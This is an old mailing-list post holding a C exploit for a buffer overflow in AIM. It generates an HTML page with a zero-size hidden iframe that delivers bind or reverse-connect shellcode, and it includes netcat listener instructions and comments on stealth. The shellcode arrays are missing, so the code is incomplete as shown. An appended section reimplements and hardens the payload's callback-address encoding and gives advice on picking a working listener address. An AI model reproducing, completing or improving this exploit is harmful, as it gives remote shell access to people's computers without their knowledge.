Exploit: AIM Exploit (Ignore Previous Post)
- Subject: Exploit: AIM Exploit (Ignore Previous Post)
- Date: 1 Sep 2004 13:22:57 -0000
Hi people, sorry I'm posting this again but I made a slight error in the code
on submission. The error was in the reverse_shellcode return address which I
just edited to be more universal using a universal AOL module return address...
/* Begin Exploit Code */
/*
 * AIM Away Message Buffer Overflow Exploit
 * Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit:
 * ========
 * drizzit.c
 *
 * Vulnerable Software:
 * ====================
 * - AIM 5.5.3588
 * - AIM 5.5.3590 Beta
 * - AIM 5.5.3591
 * - AIM 5.5.3595
 * and a couple of other versions...
 *
 * If you want to try other return addresses for other versions of
 * AIM then edit the return address.. But the current one embedded
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the metasploit shellcode for this exploit with some
 * modifications to get this into stealth mode so it is harder to
 * detect the attack. Since I'm using metasploit shellcode that means this
 * exploit can be used on any NT type OS, like win2k, winnt, winxp across
 * any service pack.. I don't know about SP2 though, I haven't tested
 * it yet.
 *
 * On a side note I purposely did not include the download+exec shellcode
 * even though I have it because I'm sick and tired of these little
 * spam/adware bitches messing people's computers up for profit.. You can
 * still download/upload through the shell to the victim. It just
 * isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous
 * because you can encode your ip address and pick a port, and then
 * when the victim visits the evil web page or email, whatever.. then the
 * attack will automatically open his AIM even if it's not already open and
 * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what hit them.. As I remind people in the
 * exploit usage you need to remember to use netcat to listen on the
 * port you picked for the exploit to connect to...
 *
 * One reason I decided to include the generation of html code for
 * this exploit is I noticed almost no one puts limits on the
 * <IFRAME SRC=""> attribute. So when the victim connects to that
 * page or reads that email, depending on the browser or client,
 * the exploit will execute.. IE 6.0 and Mozilla are
 * affected by this problem as well as Outlook Express when the
 * security settings are set to the Internet Zone.
 *
 * Excuse the sloppy commandline interface, I just wanted to get
 * this out to the public.
 *
 * [ Original advisory posted by Secunia and iDEFENSE. ]
 *
 * Greets:
 * =======
 * IsolationX, YpCat, DaPhire, route, #romhack,
 * Taylor Hayes, Aria Giovanni, Anthony Rocha,
 * InVerse, Deltaflame, Jenna Jameson, iDEFENSE,
 * secunia, so1o, John Kerry, and many others...
 *
 * Compiler:
 * =========
 * Visual C++ 6.0
 *
 * To compile you first must add ws2_32.lib to the Object/library modules
 * text box under the Project -> Settings menu; then click on the link tab...
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* Exploit Data */
/* The bytes of the three arrays below are not reproduced on this page;
   only the declarations survived.  main() patches reverse_shellcode at
   offsets 191-199 and bind_shellcode at offsets 204-207, and appends the
   chosen payload to injection_vector with string functions, so the
   arrays are expected to be NUL-terminated C strings. */
char injection_vector[] =
char bind_shellcode[] =
char reverse_shellcode[] =

/* Function Prototypes */
void print_usage(char *prog_name);
unsigned char xor_data(unsigned char byte);

/* Function Code */
int main(int argc, char *argv[])
{
    int i = 0;
    int raw_num = 0;
    unsigned long port = 1337;          /* default port for bind and
                                           reverse attacks */
    unsigned long encoded_port = 0;
    unsigned char print_raw_exploit = 0;
    unsigned char attack_mode = 2;      /* bind attack by default */
    char ip_addr[256];
    char exploit[2048];
    char *p1, *p2;
    char outfile[512];
    WSADATA wsa;
    FILE *EXPLOIT_FP;

    /* zero the buffers so the strncpy() calls below always leave a
       terminated string behind */
    memset(ip_addr, 0, sizeof(ip_addr));
    memset(exploit, 0, sizeof(exploit));
    memset(outfile, 0, sizeof(outfile));

    if (argc < 2) print_usage(argv[0]);   /* print_usage() exits */

    /* process commandline */
    for (i = 1; i < argc; i++) {
        if (argv[i][0] == '-') {
            switch (argv[i][1]) {
            case 'r':
                /* reverse connect: the next argument is our IP */
                if (i + 1 < argc) strncpy(ip_addr, argv[i+1], 20);
                attack_mode = 1;
                break;
            case 'b':
                /* bind */
                attack_mode = 2;
                break;
            case 'p':
                /* port */
                if (i + 1 < argc) port = atoi(argv[i+1]);
                break;
            case 'o':
                /* raw exploit string to stdout */
                print_raw_exploit = 1;
                break;
            case 'e':
                /* html file to write */
                if (i + 1 < argc) strncpy(outfile, argv[i+1], 256);
                break;
            }
        }
    }

    /* initialize the socket library (needed for htonl) */
    if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
        printf("Error: Winsock didn't initialize!\n");
        return 1;
    }

    /* build exploit: injection vector first, shellcode appended after it */
    strncpy(exploit, injection_vector, strlen(injection_vector));
    exploit[strlen(injection_vector)] = 0;   /* tack on NULL byte */

    /* htonl() puts the port in network byte order; bytes 2 and 3 of the
       result (high byte first on a little-endian host) are the ones the
       shellcode wants, XOR-encoded with 0x92 */
    encoded_port = htonl(port);
    encoded_port += 2;

    if (attack_mode == 1) {
        /* reverse connect attack: patch our IP (bytes 191-194) and the
           port (bytes 198-199) into the shellcode */
        reverse_shellcode[196] = (char) 0x90;
        reverse_shellcode[197] = (char) 0x92;
        reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
        reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));

        /* the dotted-quad must have three dots or the pointer walk below
           would dereference NULL */
        p1 = strchr(ip_addr, '.');
        p2 = p1 ? strchr(p1 + 1, '.') : NULL;
        if (p1 == NULL || p2 == NULL || strchr(p2 + 1, '.') == NULL) {
            fprintf(stderr, "Error: -r needs a dotted-quad IP address\n");
            return 1;
        }

        /* atoi() stops at the '.', so each call yields one octet */
        raw_num = atoi(ip_addr);
        reverse_shellcode[191] = xor_data((char)raw_num);

        raw_num = atoi(p1 + 1);
        reverse_shellcode[192] = xor_data((char)raw_num);

        raw_num = atoi(p2 + 1);
        reverse_shellcode[193] = xor_data((char)raw_num);

        p2 = strrchr(ip_addr, '.');
        raw_num = atoi(p2 + 1);
        reverse_shellcode[194] = xor_data((char)raw_num);

        strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
    }

    if (attack_mode == 2) {
        /* bind attack: patch the listening port into bytes 206-207 */
        bind_shellcode[204] = (char) 0x90;
        bind_shellcode[205] = (char) 0x92;
        bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
        bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));

        strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
    }

    /* output exploit */
    if (print_raw_exploit == 1) {
        printf("%s", exploit);
    }
    else {
        if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
            fprintf(stderr, "Error: Exploit file can't be opened!\n");
            return 1;
        }
        fprintf(EXPLOIT_FP, "<html>\n");
        fprintf(EXPLOIT_FP, "<head>\n");
        fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
        fprintf(EXPLOIT_FP, "</head>\n");
        fprintf(EXPLOIT_FP, "<body>\n");
        fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
        fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
        fprintf(EXPLOIT_FP, "%s", exploit);
        fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
        fprintf(EXPLOIT_FP, "</body>\n");
        fprintf(EXPLOIT_FP, "</html>\n");
        fclose(EXPLOIT_FP);

        /* im to lazy to make a macro for this banner :P */
        printf(" +-------------------------------------------------+\n");
        printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes    |\n");
        printf(" | AIM Away Message Buffer Overflow Exploit        |\n");
        printf(" +-------------------------------------------------+\n\n");
        printf(" Exploit created!\n\n");
        printf(" Remember if you use the -r option to have netcat listening\n");
        printf(" on the port you are using for the attack so the victim will\n");
        printf(" be able to connect to you when exploited...\n\n");
        printf(" Example:\n");
        printf("\tnc.exe -l -p %d", port);
    }

    WSACleanup();
    return 0;
}

void print_usage(char *prog_name)
{
    printf(" +-------------------------------------------------+\n");
    printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes    |\n");
    printf(" | AIM Away Message Buffer Overflow Exploit        |\n");
    printf(" +-------------------------------------------------+\n\n");
    printf(" Exploit Usage:\n");
    printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
    printf(" Parameters:\n");
    printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n"
           "\t\t\t\t and choose -b for a bind attack. By default if you\n"
           "\t\t\t\t don't specify -r or -b then a bind attack will be\n"
           "\t\t\t\t generated.\n\n");
    printf("\t-p (optional)\t\t This option will allow you to change the port\n"
           "\t\t\t\t used for a bind or reverse connect attack. If the\n"
           "\t\t\t\t attack mode is bind then the victim will open the -p\n"
           "\t\t\t\t port. If the attack mode is reverse connect then the\n"
           "\t\t\t\t port you specify will be the one you want to listen\n"
           "\t\t\t\t on so the victim can connect to you right away.\n\n");
    printf("\t-o or -e outfile\t Here you specify the output method...\n"
           "\t\t\t\t If you would like output to go straight to standard\n"
           "\t\t\t\t output then specify the -o option, otherwise give the\n"
           "\t\t\t\t path of where you want to create the exploit file,\n"
           "\t\t\t\t which is basically a simple html file. The -o option\n"
           "\t\t\t\t is useful if you want to test the exploit url in\n"
           "\t\t\t\t different ways.\n\n");
    printf(" Examples:\n");
    printf("\t%s -r -p 8888 -e c:\\exploit.html\n", prog_name);
    printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
    printf("\t%s -b -o\n", prog_name);
    printf("\t%s -r -o\n\n", prog_name);
    printf(" Remember if you use the -r option to have netcat listening\n");
    printf(" on the port you are using for the attack so the victim will\n");
    printf(" be able to connect to you when exploited...\n\n");
    printf(" Example:\n");
    printf("\tnc.exe -l -p 8888");

    exit(1);
}

/* the shellcode expects its IP and port bytes XORed with 0x92 */
unsigned char xor_data(unsigned char byte)
{
    return (byte ^ 0x92);
}
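The part of main() above that is worth understanding on its own is how the callback address gets into the payload: the four octets and the two port bytes are written into fixed offsets of the shellcode, each XORed with 0x92, and the result is then appended with strncat(). The following is an added example, not code from HighT1mes' post: it reimplements that encoding with a strict dotted-quad parser, a bounds-checked patch routine, a decoder so the patch can be verified, and a check for the one failure mode the original silently has, namely an octet or port byte that XORs to 0x00 and so truncates the payload when it is handled as a C string. The offsets 191/198 and the key 0x92 are taken from the exploit; the shellcode buffer here is a constructed stand-in, and the assumption that a decoder inside the real shellcode undoes the XOR at run time is exactly that, an assumption.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>

#define XOR_KEY     0x92   /* key used by xor_data() in the exploit above */
#define IP_OFFSET   191    /* reverse_shellcode[191..194] holds the IP   */
#define PORT_OFFSET 198    /* reverse_shellcode[198..199] holds the port */

/* Strict "a.b.c.d" parser: exactly four decimal octets in 0..255 and nothing
 * else.  Returns 0 on success, -1 on malformed input.  (The original walks the
 * string with strchr() and dereferences NULL on input such as "1.2.3".) */
int parse_ipv4(const char *s, uint8_t out[4])
{
    int n = 0;
    while (n < 4) {
        unsigned value = 0;
        int digits = 0;
        if (!isdigit((unsigned char)*s)) return -1;
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (unsigned)(*s - '0');
            if (++digits > 3 || value > 255) return -1;
            s++;
        }
        out[n++] = (uint8_t)value;
        if (n < 4) {
            if (*s != '.') return -1;
            s++;
        }
    }
    return *s == '\0' ? 0 : -1;
}

/* Port in network byte order (high byte first, as sin_port expects), XORed
 * with the key.  main() above reaches the same two bytes through htonl()
 * on a little-endian host with (encoded_port >> 16) and (encoded_port >> 24). */
void encode_port(uint16_t port, uint8_t out[2])
{
    out[0] = (uint8_t)(port >> 8) ^ XOR_KEY;
    out[1] = (uint8_t)(port & 0xff) ^ XOR_KEY;
}

/* 1 if any encoded byte is 0x00, 0 if the encoding is safe to carry in a C
 * string, -1 on a bad IP.  An octet of 146 (0x92) or a port byte of 0x92
 * encodes to NUL, and the exploit's strncat() would stop there. */
int encoded_has_nul(const char *ip, uint16_t port)
{
    uint8_t octets[4], enc[2];
    int i;
    if (parse_ipv4(ip, octets) != 0) return -1;
    encode_port(port, enc);
    if (enc[0] == 0 || enc[1] == 0) return 1;
    for (i = 0; i < 4; i++)
        if ((uint8_t)(octets[i] ^ XOR_KEY) == 0) return 1;
    return 0;
}

/* Write the encoded IP and port into a shellcode buffer with bounds checks.
 * Returns 0 on success, -1 if the IP is malformed or the buffer is too short. */
int patch_shellcode(uint8_t *buf, size_t len, const char *ip, uint16_t port)
{
    uint8_t octets[4], enc_port[2];
    int i;
    if (parse_ipv4(ip, octets) != 0) return -1;
    if (len < PORT_OFFSET + 2) return -1;
    encode_port(port, enc_port);
    for (i = 0; i < 4; i++) buf[IP_OFFSET + i] = octets[i] ^ XOR_KEY;
    memcpy(buf + PORT_OFFSET, enc_port, 2);
    return 0;
}

/* Inverse of patch_shellcode(): recover the plaintext IP and port so a built
 * payload can be checked before it is shipped. */
void read_patched(const uint8_t *buf, char ip_out[16], uint16_t *port_out)
{
    snprintf(ip_out, 16, "%d.%d.%d.%d",
             buf[IP_OFFSET] ^ XOR_KEY, buf[IP_OFFSET + 1] ^ XOR_KEY,
             buf[IP_OFFSET + 2] ^ XOR_KEY, buf[IP_OFFSET + 3] ^ XOR_KEY);
    *port_out = (uint16_t)(((buf[PORT_OFFSET] ^ XOR_KEY) << 8) |
                           (buf[PORT_OFFSET + 1] ^ XOR_KEY));
}

int main(void)
{
    uint8_t shellcode[220];   /* constructed stand-in, not the real payload */
    char ip[16];
    uint16_t port;
    memset(shellcode, 0x90, sizeof shellcode);
    if (patch_shellcode(shellcode, sizeof shellcode, "192.168.1.10", 1337) != 0)
        return 1;
    read_patched(shellcode, ip, &port);
    printf("patched callback %s:%u, string-safe: %s\n", ip, port,
           encoded_has_nul("192.168.1.10", 1337) ? "no" : "yes");
    return 0;
}
```

For port 1337 the encoded bytes are 0x97 0xAB (0x05^0x92, 0x39^0x92), which is what the exploit's `(encoded_port >> 16)` / `(encoded_port >> 24)` arithmetic yields on Win32; the `+= 2` in the original only touches the low 16 bits of the htonl() result and so never reaches those two bytes. Before handing an address to the -r option, run it through encoded_has_nul(): a listener on 146.x.x.x, or on a port whose high or low byte is 0x92, cannot be carried by this payload format.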